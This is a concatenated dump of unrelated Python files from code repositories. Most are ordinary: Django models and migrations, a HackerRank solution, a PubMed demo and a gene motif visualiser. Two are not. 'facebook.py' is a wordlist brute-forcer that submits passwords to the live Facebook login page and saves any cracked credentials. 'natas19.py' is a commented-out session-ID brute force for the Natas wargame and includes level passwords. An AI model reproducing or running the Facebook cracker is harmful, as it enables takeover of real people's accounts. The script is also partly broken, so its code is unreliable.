] | permissive | definitelysecure/shipwrecked | 7cf28e3dfcd66082746638e7830eeb128fbdc403 | 3b79c6df63ed3c271ccb1b8a21081c76bcd9f08a | refs/heads/master | 2020-03-29T05:14:09.856261 | 2018-09-20T08:07:52 | 2018-09-20T08:07:52 | 149,574,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,100 | py | from __future__ import unicode_literals
from django.db import models
class ModerationManager(models.Manager):
"""
Provide methods to reduce code in views.
"""
def get_by_message_id(self, message_id):
return self.filter(message_id=message_id).first()
class Moderation(models.Model):
"""
Record Moderation request from client service
"""
content_key = models.TextField()
content = models.TextField()
content_author_id = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
status = models.CharField(max_length=50)
status_reason = models.CharField(max_length=50)
status_date = models.DateTimeField(auto_now=True)
message_id = models.TextField(blank=True, null=True)
objects = ModerationManager()
class ModerationAction(models.Model):
"""
Keep history of back and forth between service and Slack.
"""
moderation = models.ForeignKey(Moderation)
action = models.CharField(max_length=50)
action_author_id = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
| [
"[email protected]"
] | |
d1d54b1b8df0b844653460855a20130d05b2162a | 4af115348bf6d3fa5bb4eaefa77cf1cb214085cf | /account/migrations/0007_auto_20211029_1229.py | 1941dd729154bc0eb09c633c2f5e01871fc8341e | [] | no_license | Leonlee999/webscraping | e00ceaac3bd4d87c60e011e998dddcf539705caa | 6406737f19afdb647d2da13065f49b4e15a8ed94 | refs/heads/master | 2023-08-28T21:47:31.275403 | 2021-11-11T03:27:54 | 2021-11-11T03:27:54 | 424,569,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | # Generated by Django 3.0 on 2021-10-29 06:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('account', '0006_auto_20211028_1541'),
]
operations = [
migrations.AddField(
model_name='user',
name='c_company',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name='user',
name='c_ctc',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name='user',
name='college',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AddField(
model_name='user',
name='degree',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AddField(
model_name='user',
name='experience',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name='user',
name='grade',
field=models.CharField(blank=True, max_length=10, null=True),
),
migrations.AddField(
model_name='user',
name='skills',
field=models.CharField(blank=True, max_length=200, null=True),
),
]
| [
"[email protected]"
] | |
9b157c9f8b7dee6f286c8027208406a14e2a6b4f | 29e6bb047c5723c6e90a0209305f2167f3cae8be | /Algorithm/stone_division.py | e007c89bf49bffdcd585c4a1cb634c79e5b0cd7b | [] | no_license | basant-kumar/Hackerrank | a42c93e1efc95dd19e0704bf45db4e6492b0b7f2 | 4b35c62e8942d8887257da5a48f827f337bf08a8 | refs/heads/master | 2021-01-11T00:12:10.737874 | 2017-01-06T15:46:45 | 2017-01-06T15:46:45 | 70,580,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,041 | py | dp = {}
s=[]
def recs(n,c,p):
l = len(s)
pw = False
if p==1:
q=2
else:
q=1
div = False
for i in range(0,l):
if n%s[i]==0:
div = True
#print ' n = '+`n`+' n/si = '+`n/s[i]`+' p = '+`p`+' c = '+`c`
if not n/s[i] in dp:
dp[n/s[i]] = recs(n/s[i],s[i],q)
if dp[n/s[i]]==p:
pw=True
break
elif dp[n/s[i]]==p:
pw = True
break
else:
pass
if div==True:
if pw == True and c%2==1:
# print ' winner : '+`p`
return p
elif pw == False and c%2==0:
# print ' winner : '+`q`
return p
else:
return q
else:
return q
t = raw_input()
t = t.split(' ')
n = int(t[0])
m = int(t[1])
x = raw_input()
x = x.split(' ')
for i in range(0,m):
s.append(int(x[i]))
if recs(n,1,1)==1:
print 'First'
else:
print 'Second' | [
"[email protected]"
] | |
61394911ab48fc156a2ff9b7fdba2e12ffd3cbe1 | 84d3cc3d2e577d19b471b96f1ea994c069665614 | /bin/demo_get_related_pmids.py | 1fd5db2aa76a413e36c06053057766cc338383e2 | [
"Apache-2.0"
] | permissive | jvansan/metapub | 8a5157ff9d95151690c551fbddcebfec3f5cd93e | d5e7a2401c1598b1e2662d2f91491296e605281d | refs/heads/master | 2020-11-25T02:51:57.537383 | 2020-01-09T22:24:39 | 2020-01-09T22:24:39 | 228,463,348 | 0 | 0 | Apache-2.0 | 2019-12-16T19:48:54 | 2019-12-16T19:48:54 | null | UTF-8 | Python | false | false | 646 | py | from __future__ import absolute_import, print_function, unicode_literals
import sys
from metapub import PubMedFetcher
fetch = PubMedFetcher()
try:
pmid = sys.argv[1]
except IndexError:
print("Supply a pubmed ID as the argument to this script.")
sys.exit()
result = fetch.related_pmids(pmid)
for key in list(result.keys()):
print(key)
for pmid in result[key]:
outp = pmid
article = fetch.article_by_pmid(pmid)
#outp += ' %s' % article.title
outp += ' %s' % article.citation
if article.pmc:
outp += ' (PMC)'
outp += '\n'
print(outp)
print("")
| [
"[email protected]"
] | |
d244482137c56cba1378c26bdda524155e967880 | 076ba705851d8436151768c793b87156bd8dac64 | /motifmark_oop.py | 38161f0f408f9adee5bc527b9d906377efb49791 | [] | no_license | demiglidden/motif-mark-oop | d94315a69bf25dc203be4c698009aa730305ecbf | 93ecd3c575cd40e556622e25ea9394026c560fe3 | refs/heads/main | 2023-03-15T07:19:20.329551 | 2021-03-07T02:52:34 | 2021-03-07T02:52:34 | 343,573,847 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,894 | py | #!/usr/bin/env python
#########################################################################################################
## This program will take fasta file of genes (where exons are capitalized and introns are lower case) ##
## and a file of motifs (each motif on it's own line) and will produce a visualiztion of all ##
## motif locations on each gene using object oriented programming. ##
##########################################################################################################
import cairo
import argparse
import re
def get_args():
parser = argparse.ArgumentParser("a program to produce two-line fastas")
parser.add_argument("-f", "--fasta", type=str, help="fasta file of genes to pass through program", required=True)
parser.add_argument("-m", "--motifs", type=str, help="motif file", required=True)
parser.add_argument("-o", "--output", type=str, help="name of output (optional), default output uses name of fasta file", required=False)
return parser.parse_args()
args = get_args()
###assign arguments to variables inside of program
fasta = args.fasta
motifs = args.motifs
out = args.output
#split input name for to get prefix to add to svg output
outputname = re.split('\.', fasta)
#motif disambiguation dictionary
regex_dict = {
"A":"[Aa]",
"C":"[Cc]",
"G":"[Gg]",
"T":"[TtUu]",
"U":"[UuTt]",
"W":"[AaTtUu]",
"S":"[CcGg]",
"M":"[AaCc]",
"K":"[GgTtUu]",
"R":"[AaGg]",
"Y":"[CcTtUu]",
"B":"[CcGgTtUu]",
"D":"[AaGgTtUu]",
"H":"[AaCcTtUu]",
"V":"[AaCcGg]",
"N":"[AaCcGgTtUu]",
"Z":"[-]",
}
#############
# Functions #
#############
def find_exon(seq):
'''this function will return the start and end positions of the exon'''
exon_tuple = re.search('([A-Z]+)', seq)
exon = exon_tuple.span()
return exon
def get_regex(motif):
'''this function will take a motif and return a regex to find that motif'''
motif_regex = ""
for char in motif:
motif_regex += regex_dict[char]
return(motif_regex)
def find_positions(seq, reggie):
''' '''
pos_list = []
motifs = re.finditer(reggie, seq)
for match in motifs:
if match is None:
continue
else:
coords = match.span()
pos_list.append(coords)
return pos_list
###########
# Classes #
###########
class FastaHeader:
'''A FastaHeader object stores its start, text, and maybe font.'''
def __init__(self, context, header, gene_count):
#data
self.context = context
self.header = header
self.gene_count = gene_count
#methods
def draw(self, context):
context.set_source_rgba(0, 0, 0, 1)
context.move_to(15, int(self.gene_count)*VERT_PAD + 10)
context.show_text(self.header)
class Gene:
'''Gene class – A Gene object should be given enough information that it can figure out how to draw itself.'''
def __init__(self, context, gene, gene_count):
#data
self.context = context
self.gene = gene
self.gene_count = gene_count
#methods
def draw(self, context):
'''this method will draw the gene as a horizontal black line, proportional to it's length in nucleotides'''
context.set_line_width(3)
context.set_source_rgba(0, 0, 0, 1)
context.move_to(15, int(self.gene_count)*VERT_PAD + 30)
context.line_to(15+len(self.gene), int(self.gene_count)*VERT_PAD + 30)
context.stroke()
class Exon:
'''An Exon object stores its start, length, and maybe width, similar to Gene.'''
def __init__(self, context, coords, gene_count):
#data
self.coords = coords
self.gene_count = gene_count
#methods
def draw(self, context):
'''this method will draw the exon on the gene'''
context.set_source_rgba(0.23,0.25,0.25, 1)
context.rectangle(15+int(self.coords[0]),int(self.gene_count)*VERT_PAD+20,int(self.coords[1])-int(self.coords[0]),15) #(x0,y0,x1,y1)
context.fill()
class Motifs:
'''A Motifs object stores a list of motif positions along a given gene and can draw them.'''
def __init__(self, context, coords_list, R, G, B, gene_count):
#data
self.context = context
self.coords_list = coords_list
self.gene_count = gene_count
self.R = R
self.G = G
self.B = B
#methods
def draw(self, context):
'''this methods will draw rectangles for the motif positions on the gene-line for the coordinates produced by find_positions()'''
for i in self.coords_list:
coords = list(i)
context.set_source_rgba(float(self.R),float(self.G),float(self.B),.7)
context.rectangle(15+int(coords[0]),int(self.gene_count)*VERT_PAD+20,int(coords[1])-int(coords[0]),15) #(x0,y0,x1,y1)
context.fill()
class GeneGroup:
'''A gene group object manages and organizes the information (gene, exon, and motifs) for each fasta record'''
def __init__(self):
#data
self.gene_count = None
self.header = None
self.gene = None
self.exon = None
self.motifs = []
self.context = None
#methods
def draw(self, context):
self.header.draw(context)
self.gene.draw(context)
self.exon.draw(context)
for i in self.motifs:
i.draw(context)
#############
# Algorithm #
#############
## parse file to get number of genes and length of longest gene to format context ##
gene_count = 0
gene = ''
seqs = []
#iterate through the file to get the gene count and longest gene for svg dimensions
with open (fasta, "r") as fh:
for line in fh:
if line[0] != '>':
seq = line.strip()
gene += seq
else:
gene_count += 1
seqs.append(gene)
gene = ''
seqs.append(gene)
longest_gene = (len(max(seqs, key=len)))
## figure set up using gene count ##
VERT_PAD = 50 #this number dictates the space between genes, or the 'vertical padding'
WIDTH = int(longest_gene) + 30 #width of figure
HEIGHT = int(gene_count+10) * VERT_PAD #height of figure
surface = cairo.SVGSurface(outputname[0]+'.svg', WIDTH, HEIGHT) #coordinates to display graphic and output name
context = cairo.Context(surface) #create the coordinates you will be drawing on
#establish motif colors
Rs = ("0.27","1","0.20","0.75","1")
Gs = ("0.5",".63","0.11","0.13",".72")
Bs = ("0.08",".15","1.00","0.06",".83")
## parse through file again to store data as objects and draw the figure ##
motifs_list = []
GENE_COUNT = 0
gene = ''
GENE_GROUPS = []
with open (fasta, "r") as fh, open (motifs, "r") as mt:
#extract motifs from file into list
for line in mt:
motif = line.strip()
motif = motif.upper()
if motif not in motifs_list:
motifs_list.append(motif)
#start parsing the fasta
for line in fh:
if line[0] == '>':
if gene != '':
# gene #
group_obj.gene = Gene(context, gene, GENE_COUNT)
# exon #
coords = find_exon(gene)
group_obj.exon = Exon(context, coords, GENE_COUNT)
# motifs #
itR = iter(Rs)
itG = iter(Gs)
itB = iter(Bs)
for motif in motifs_list:
#call motif color
R = next(itR)
G = next(itG)
B = next(itB)
reggie = get_regex(motif)
coords_list = find_positions(gene, reggie)
group_obj.motifs.append(Motifs(context, coords_list, R, G, B, GENE_COUNT))
group_obj.gene_count = GENE_COUNT
# add gene group to list
GENE_GROUPS.append(group_obj)
# reset header and gene seq
group_obj = GeneGroup()
header = line.strip()
GENE_COUNT += 1
group_obj.header = FastaHeader(context, header, GENE_COUNT)
gene = ''
group_obj = GeneGroup()
header = line.strip()
#group_obj.gene = Gene(context, gene, GENE_COUNT)
group_obj.header = FastaHeader(context, header, GENE_COUNT)
#GENE_GROUPS.append(group_obj)
else:
seq = line.strip()
gene += seq
#repeat for last sequence
# gene #
group_obj.gene = Gene(context, gene, GENE_COUNT)
coords = find_exon(gene)
group_obj.exon = Exon(context, coords, GENE_COUNT)
# motifs #
itR = iter(Rs)
itG = iter(Gs)
itB = iter(Bs)
for motif in motifs_list:
#call motif color
R = next(itR)
G = next(itG)
B = next(itB)
reggie = get_regex(motif)
coords_list = find_positions(gene, reggie)
group_obj.motifs.append(Motifs(context, coords_list, R, G, B, GENE_COUNT))
GENE_GROUPS.append(group_obj)
for gene_group in GENE_GROUPS:
gene_group.draw(context,)
#draw legend
#make motif colors iterable one last time
itR = iter(Rs)
itG = iter(Gs)
itB = iter(Bs)
motif_counter = 0
#write "legend"
context.set_source_rgba(0, 0, 0, 1)
context.move_to(15,(int(GENE_COUNT)+1)*VERT_PAD+15)
context.show_text("Legend")
for i in motifs_list:
#call motif color
R = next(itR)
G = next(itG)
B = next(itB)
#draw legend
context.set_source_rgba(float(R), float(G), float(B), .9)
context.rectangle(15,((GENE_COUNT+1)*VERT_PAD)+int(motif_counter+1)*20,40,10)
context.fill()
#write motif
context.move_to(60,((GENE_COUNT+1)*VERT_PAD)+int((motif_counter+1)*20)+10)
context.show_text(i)
motif_counter += 1
surface.finish() #close svg file | [
"[email protected]"
] | |
31b149a4ed5f3f4b04509a67768e7fbec1f1c3ab | 651bf57e96ce5471919b2d13a450d2692dae2f07 | /vacancy/apps.py | c3507b2355507b514f7a2d9a60c837e444320365 | [] | no_license | vacuumfull/hh-parser | 3cb45cd5a4191cafd38a71489456c9fa69ff641f | 4b50be35d4a58d570865fe439af85720ae5410f8 | refs/heads/master | 2020-03-08T20:11:31.964286 | 2018-02-28T10:59:09 | 2018-02-28T10:59:09 | 128,375,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | from django.apps import AppConfig
class VacancyConfig(AppConfig):
name = 'vacancy' | [
"[email protected]"
] | |
1a81bf4235d3360478e2013bec61e305dbcb00b8 | f3acce90044b2745a6f8da0750d0e6dc1e79c225 | /natas19.py | 02f2a56b84dfef31e3c5df9169cd4aa634855bcf | [] | no_license | aprilian404/Natas | 446a18bfdcc44ed24a7acbffc32e51aa5af4b248 | 43a74293f0eeeb6582e404d048dbfc811d73b094 | refs/heads/master | 2021-03-06T07:40:54.892754 | 2020-03-12T14:18:57 | 2020-03-12T14:18:57 | 246,189,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 701 | py | # import requests
# URL = "http://natas19.natas.labs.overthewire.org/"
# Username='natas19'
# Password='4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs'
# i = 0
# while i < 641:
# session = 'PHPSESSID='+''.join([str(30+int(c)) for c in str(i)])+'2d61646d696e'
# query = {'username':'admin','password':'a'}
# res = requests.post(URL, data=query, headers = {'Content-Type': 'application/x-www-form-urlencoded','Cookie': session} , auth=(Username, Password) )
# if not 'regular' in (str(res.content, 'utf-8')):
# print('Result', session)
# print('\n\n', res.content)
# break
# print(i)
# i = i+1
# # Username: natas20
# # Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
| [
"[email protected]"
] | |
dfcdf54d7cdde78843d63e2e36fc58360aefdfa1 | 29452669ce7c2ed267e14a9f83bfae999da2c5d8 | /Social-Cracker(main code 2018))/Individual Modules/facebook.py | 9aaa6e65550cab7f19dcc6b0120a1f65c6f9e717 | [] | no_license | Firestormhacker/Large-Social-Cracker | 64c5ee0ac7ce17ffca19ec1baf385f0ae0fd68cb | 7359885b56092e8a9ec1d31c95487d19fe6ae0e1 | refs/heads/master | 2020-03-24T22:25:58.625959 | 2018-08-01T00:57:48 | 2018-08-01T00:57:48 | 143,085,291 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,938 | py | #!/usr/bin/env python
def facebook():
site = 'Facebook'
attempt=0
e = os.system(d)
print ""+G+" "
d = '''
{}<><><><><><><><><><><><><><><><><><><><><>{}
{ Facebook-Cracker 3.0| Created by Andrew-El }
{}<><><><><><><><><><><><><><><><><><><><><>{}
'''
url = 'https://www.facebook.com/login.php'
d
print '''
Username or Phone number/email?
p = phone, u = username
'''
pu = raw_input("option:").lower()
if pu == 'u':
username = raw_input('Username:')
ulio = requests.get('https://www.facebook.com/' + username)
if ulio.status_code == 200:
e
print "Username Exists!"
else:
print("That doesn't Exist!")
sleep(3)
e
facebook()
elif pu == 'p':
username = raw_input(color.BLUE + 'Phone_Number/Email:')
else:
print 'not an option'
sleep(3)
os.system(d)
facebook()
wordliste = raw_input(color.YELLOW + 'PATH to wordlist:' + color.GREEN)
try:
wordlister = open(wordliste, 'r')
except:
print "list isn't found"
sleep(3)
os.system(d)
facebook()
print("Default is 4")
timmir = int(raw_input(color.YELLOW + "delay time between guesses:" + color.GREEN) or 4)
os.system(d)
print 'Do you want to save the output to a file?'
deltaco = raw_input(':')
os.system(d)
fil = raw_input(color.YELLOW + 'PATH to output file:' + color.GREEN)
try:
fil = open(fil, 'a')
except:
os.system(d)
print "That doesn't exist"
deltaco = deltaco.lower()
wordlist = list(wordlister)
for password in wordlist:
try:
attempt=attempt+1
password = password.strip()
f = mechanize.Browser()
f.set_handle_equiv(True)
f.set_handle_referer(True)
f.set_handle_robots(False)
f.addheaders = [('User-Agent', useragent)]
response = f.open(url)
f.form = list(f.forms())[0]
f.form['email'] = username
f.form['pass'] = password
f.method = 'POST'
response = f.submit()
if response.geturl() == 'https://www.facebook.com/':
print ""+B+" "
print
print'[-]=============================[-]'
print'[-]Facebook-Cracker|V3.0|Andrew [-]'
print'[-]=============================[-]'
print'[-]+++++++++++++++++++++++++++++[-]'
print('{Username:%s' % username)
print('{Wordlist:%s' % wordlist)
print('{password:%s' % password)
print('{Attempt:%s' % attempt)
print('------------------------------')
print('Password Found!')
print(color.GREEN + site + 'Username:' + username + 'Password' + password + color.BLUE)
if deltaco == 'yes':
attempt = str(attempt)
fil.write('\n' + site + '|'+ 'Username/Phone:' + username + ' Password:' + password + ' Attempt:' + attempt)
print "File saved!"
menuit()
if deltaco == 'no':
pass
else:
print "nope, that doesn't work"
quit()
elif response.geturl() == 'https://www.facebook.com/checkpoint/?next':
print ""+B+" "
print'[-]=============================[-]'
print'[-]Facebook-Cracker|V3.0|Andrew [-]'
print'[-]=============================[-]'
print'[-]+++++++++++++++++++++++++++++[-]'
print('{Username:%s' % username)
print('{Wordlist:%s' % wordliste)
print('{password:%s' % password)
print('{Attempt:%s' % attempt)
print('------------------------------')
print('Password Found!')
print(color.GREEN + site + '|' + 'Username:' + username + ' Password' + password + color.BLUE)
if deltaco == 'yes':
attempt = str(attempt)
fil.write('\n' + site + '|' + ' Username/Phone:' + username + ' Password:' + password + ' Attempt:' + attempt)
print "File Saved!"
menuit()
elif deltaco == 'no':
pass
else:
print "nope, that doesn't work"
quit()
elif response.geturl() == 'https://www.facebook.com/?sk=welcome':
print ""+B+" "
print'[-]=============================[-]'
print'[-]Facebook-Cracker|V3.0|Andrew [-]'
print'[-]=============================[-]'
print'[-]+++++++++++++++++++++++++++++[-]'
print('{Username:%s' % username)
print('{Wordlist:%s' % wordliste)
print('{password:%s' % password)
print('{Attempt:%s' % attempt)
print('------------------------------')
print('Password Found!')
print(color.GREEN + site + '|' + 'Username:' + username + ' Password' + password + color.BLUE)
if deltaco == 'yes':
attempt = str(attempt)
fil.write('\n' + site + '|' + ' Username/Phone:' + username + ' Password:' + password + ' Attempt:' + attempt)
print "File Saved!"
menuit()
elif deltaco == 'no':
pass
else:
print "nope, that doesn't work"
quit()
else:
print ""+B+" "
print'[-]=============================[-]'
print'[-]Facebook-Cracker|V3.0|Andrew [-]'
print'[-]=============================[-]'
print response.geturl()
print'[-]+++++++++++++++++++++++++++++[-]'
print('{Username:%s' % username)
print('{Wordlist:%s' % wordliste)
print('{password:%s' % password)
print('{Attempt:%s' % attempt)
print('------------------------------')
print('Password:%s Does not work!' % password)
sleep(timmir)
os.system(d)
except KeyboardInterrupt:kill()
| [
"[email protected]"
] | |
545e763fa3b1aba8b83bfdcdc1080165f6a633b3 | f22d31484a12d001826c1775a6f2d245a720fce8 | /Introdução à Programação com Python/Do autor/Códigi fonte e listagem/listagem/capitulo 07/07.01 - Alteração de uma string.py | efae6ebfba495a6cd3c482d6a12c9a1a161a3024 | [] | no_license | eduardoprograma/linguagem_Python | 9eb55f0a5a432a986e047b091eb7ed7152b7da67 | 942aba9146800fc33bbea98778467f837396cb93 | refs/heads/master | 2021-07-07T20:48:37.673101 | 2020-07-31T21:24:17 | 2020-07-31T21:24:17 | 159,852,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | ##############################################################################
# Parte do livro Introdução à Programação com Python
# Autor: Nilo Ney Coutinho Menezes
# Editora Novatec (c) 2010-2017
# Primeira edição - Novembro/2010 - ISBN 978-85-7522-250-8
# Primeira reimpressão - Outubro/2011
# Segunda reimpressão - Novembro/2012
# Terceira reimpressão - Agosto/2013
# Segunda edição - Junho/2014 - ISBN 978-85-7522-408-3
# Primeira reimpressão - Segunda edição - Maio/2015
# Segunda reimpressão - Segunda edição - Janeiro/2016
# Terceira reimpressão - Segunda edição - Junho/2016
# Quarta reimpressão - Segunda edição - Março/2017
#
# Site: http://python.nilo.pro.br/
#
# Arquivo: listagem\capitulo 07\07.01 - Alteração de uma string.py
##############################################################################
S = "Alô mundo"
print(S[0])
S[0] = "a"
| [
"[email protected]"
] | |
56126378c327efcee4599dc7188b51ad58b63710 | df0a9f3ad6b74269ff72d8ab5737f8351b52ccbf | /Assignments/Week2_3/Python/binary2img.py | ed0848d449a84e679eeb567c7a723b2a9c073645 | [] | no_license | DuongTam1410/IU | bc6794905e9cd95f8d807d8e1d745b882d0ef75c | bdcebda5f3c8516a060a076bea2fa5e7ba5e4d39 | refs/heads/main | 2023-05-04T15:54:31.777517 | 2021-06-01T05:26:21 | 2021-06-01T05:26:21 | 343,701,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 980 | py | import numpy as np
import cv2 as cv
def rgb2gray(r,g,b):
gray = (0.2989*r + 0.5870*g + 0.1140*b) / 255
return gray
image = np.zeros((500, 500, 3), np.uint8)
f1 = open('Dataset/Text/blue8b.txt', 'r')
f2 = open('Dataset/Text/green8b.txt', 'r')
f3 = open('Dataset/Text/red8b.txt', 'r')
f4 = open('Dataset/Text/GrayPython8b.txt', 'w')
pixelsb = []
pixelsg = []
pixelsr = []
for x1 in f1:
pixelsb.append(int(x1,2))
for x2 in f2:
pixelsg.append(int(x2,2))
for x3 in f3:
pixelsr.append(int(x3,2))
i = 0
j = 0
k = 0
for i in range(500):
for j in range(500):
image[i, j] = (pixelsb[k], pixelsg[k], pixelsr[k])
f4.write(str(int(rgb2gray(pixelsb[k]*255, pixelsg[k]*255, pixelsr[k]*255)))+'\n')
k = k + 1
# Write image
#cv.imwrite('vel_moi.jpg', image)
#cv.imshow('Mau',image)
b,g,r = cv.split(image)
img_gray = rgb2gray(r, g, b)
cv.imshow('Gray',img_gray)
cv.waitKey()
cv.destroyAllWindows()
f1.close()
f2.close()
f3.close()
f4.close() | [
"[email protected]"
] | |
354308ea2dc9307ff4130f508e8b3b3c44281109 | 3597488b9cb22c6e23528b889f5581f0050b4a7c | /tableService.py | 1fa0c01a01a8e40203c6133daed6d483104c2af8 | [] | no_license | shawzh/snipa | 2e517066756f457092b5aeeea7e57780f24c4b9d | 58de9bdece3510360038420e66066f1bb72b2a16 | refs/heads/master | 2021-01-02T23:09:19.521174 | 2017-09-19T15:04:32 | 2017-09-19T15:04:32 | 99,476,413 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,833 | py | import datetime
from PyQt5.QtWidgets import QTableWidgetItem
class TableService():
def __init__(self, pcaps, model):
self.pcaps = pcaps
self.model = model
def insertDataToTable(self):
preRow = self.model.rowCount()
self.model.setRowCount(preRow+self.pcaps.res.__len__())
#转换数据格式
for row in self.build():
for n, key in enumerate(row):
item = QTableWidgetItem(str(key))
self.model.setItem(preRow, n, item)
preRow = preRow+1
def build(self):
rows = []
for p in self.pcaps:
# 只有一层
time = datetime.datetime.fromtimestamp(p.time).strftime("%Y-%m-%d %H:%M:%S")
src = self.getSrc(p)
dst = self.getDst(p)
raw = self.getRaw(p)
length = len(p.original)
proto = self.getProto(p)
row = [time, src, dst, proto, length, raw]
if row[2] == '239.255.255.250':
row[3] = 'SSDP'
rows.append(row)
return rows
def getSrc(self, p):
try:
return p['IP'].src
except:
try:
return p['ARP'].psrc
except:
return 'miss src'
def getDst(self, p):
try:
return p['IP'].dst
except:
try:
return p['ARP'].pdst
except:
return 'miss dst'
def getRaw(self, p):
try:
return p.summary()
except:
return 'miss'
def getProto(self, p):
try:
t = p['TCP']
return 'TCP'
except:
try:
t = p['UDP']
return 'UDP'
except:
return 'ARP'
| [
"[email protected]"
] | |
ca8aab44108b0780f2a4d6b4c46508d630f53073 | 9dab41a71bf19a9ad17ee3e9f77c0f58aebd1d6d | /python/uline/uline/uline/temp/__init__.py | 37069a7e2112b786ada292780a87c95a4cfef7d0 | [] | no_license | apollowesley/Demo | f0ef8ec6c4ceb0aec76771da8dd9a62fb579eac8 | 471c4af95d3a7222d6933afc571a8e52e8fe4aee | refs/heads/master | 2021-02-15T04:01:51.590697 | 2018-01-29T01:44:29 | 2018-01-29T01:44:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | #!/usr/bin/env python
#-*- coding: utf-8 -*-
# Author: Ficapy
# Create: '10/10/16'
| [
"[email protected]"
] | |
c7b686029c847611bca34a3e5eda778e122773d4 | 175075b2e11002808d5948c11620dca702db480b | /HackerRank-Security Encryption Scheme.py | 608925e575da347cda2002c44b940443182b96d2 | [] | no_license | Jeffreyhung/hackerrank | df6790c2062cdca246e5dc1274e250d229b8186a | 1d0b572762466de36226a0341ffa56cd2aea2759 | refs/heads/master | 2020-04-16T16:18:20.408779 | 2019-04-01T19:18:18 | 2019-04-01T19:18:18 | 165,731,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71 | py | x = input()
num=1
for i in range (1, x+1):
num =num* i
print num
| [
"[email protected]"
] | |
1998c9f8bbb023c8ba8846597860434a9280153a | 497f9429c56d85e69e97c35b3305a241957bc42a | /qblog/blog/migrations/0001_initial.py | 1281e20e3b9d696763e8dc42dc175369b3c39bf5 | [] | no_license | chaman1avnish/Github_api | d1a6356c124d0309d48b2b174ecae2c0fe913d4e | 90cf4156dcdbcf4b358577e2cebb0b54f48404c8 | refs/heads/master | 2021-05-16T06:49:37.795155 | 2017-09-14T07:58:26 | 2017-09-14T07:58:26 | 103,503,208 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-09-09 13:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Entry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('body', models.TextField()),
('slug', models.SlugField(max_length=200, unique=True)),
('publish', models.BooleanField(default=True)),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name_plural': 'Blog Entries',
'verbose_name': 'Blog Entry',
'ordering': ['-created'],
},
),
]
| [
"[email protected]"
] | |
8e5348f8a6abddead38abba9b00f18d658729f14 | 3e3de2655e7e4602b5309bc563db960134ce79a6 | /tempandhumiditythread.py | b4e902fae445238caddd2549b37aca7b2217cefc | [] | no_license | NahidMondol/GardenAutomation | bf95e81cd1fc75ab015438c301f4478dbd12cc21 | 040cbaa1e5a364525cb8e868a0e3c59ec090325f | refs/heads/master | 2023-07-11T11:59:21.386008 | 2021-08-13T23:58:47 | 2021-08-13T23:58:47 | 389,012,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 990 | py | import threading
import time
import sys
from tempandhumidity import TemperatureAndHumidity
class TemperatureAndHumidityThread(threading.Thread):
stop = False
sensor = None
currentTemp = None
currentHumidity = None
def __init__(self, threadID):
threading.Thread.__init__(self)
self.sensor = TemperatureAndHumidity()
self.threadID = threadID
def run(self):
"""Obtain the temperature and humidity from the sht40
until the thread is stopped
"""
print("Starting TempAndHumidity Thread")
while not self.stop:
self.currentTemp = self.sensor.getTemperature()
self.currentHumidity = self.sensor.getHumidity()
print(self.currentTemp)
print(self.currentHumidity)
time.sleep(1)
def closeThread(self):
"""Call this method to close the thread"""
self.stop = True
#threadOne = TemperatureAndHumidityThread(1)
#threadOne.start()
| [
"[email protected]"
] | |
4aa25c84448889944cb2c2a57f1b36a06161a03c | 4433c8f98a6dfed4a6ae55bcb3f875f103417271 | /lib/migrations/backends/jsonfile.py | 667db7a920b8b1e3dd9581697f904cadf3f52f1a | [] | no_license | fpliger/migrations | 97dd6daf30c198630af59c3125c7df9a35cb43dd | e52ff01778c8e24de5b1724fb93e7fe02898b06b | refs/heads/master | 2016-09-06T06:03:07.694523 | 2014-01-21T09:08:57 | 2014-01-21T09:08:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,707 | py | import os
import json
import csv, codecs, cStringIO
from sqlalchemy import types
import sqlalchemy as sa
from .base import MigratorBase
class Migrator(MigratorBase):
"""
Represent data migration from/to one or more CSV files
"""
# CSV custom options:
default_options = dict(MigratorBase.default_options)
# csv default limiter
default_options["csv_delimiter"] = ";"
# csv default file encoding
default_options["encoding"] = "utf-8"
#def initialize(self):
#MigratorBase.__init__(self, path, log_cb = None, **options)
def initialize(self):
"""
Initializes instance database engine and database cached data
"""
self.done = set()
if os.path.isdir(self.path):
self.path_dir = self.path
else:
self.path_dir = os.path.dirname(os.path.abspath(self.path))
def _migrate(self, destination, tables=None, paquet=10000, exclude=None):
if tables is None:
# No tables specified so as we are migrating information inside csv
# files we assume that we can consider all the *.csv files into
# self.path_dir as a "table".
tables = []
tables = [ filename.replace(".csv", "") for filename in \
search_files(".csv", self.path_dir, False) ]
for table_name in tables:
self.log_cb("\n\nmigrating %s" % table_name)
records = []
table = None
try:
